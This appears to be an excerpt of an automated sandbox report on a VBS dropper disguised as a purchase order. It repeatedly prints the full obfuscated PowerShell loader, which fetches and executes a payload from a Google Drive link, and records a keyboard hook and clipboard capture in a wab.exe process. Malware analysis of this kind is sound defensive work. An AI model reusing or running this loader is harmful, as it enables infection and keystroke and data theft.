            Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownHTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49716 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_3012.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_344.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3012, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 344, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7452
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7452
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7452Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7452Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLedJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F4CED62_2_00007FF848F4CED6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F4DC822_2_00007FF848F4DC82
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_000EE58D8_2_000EE58D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_000EAA3A8_2_000EAA3A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_000E4A988_2_000E4A98
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_000E3E808_2_000E3E80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_000E41C88_2_000E41C8
            Source: Texas_Tool_Purchase_Order#T18834-1.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_3012.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_344.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3012, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 344, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@12/7@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Myxogaster.OpvJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i555qyuf.ryg.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3012
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=344
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Texas_Tool_Purchase_Order#T18834-1.vbsReversingLabs: Detection: 26%
            Source: Texas_Tool_Purchase_Order#T18834-1.vbsVirustotal: Detection: 30%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop 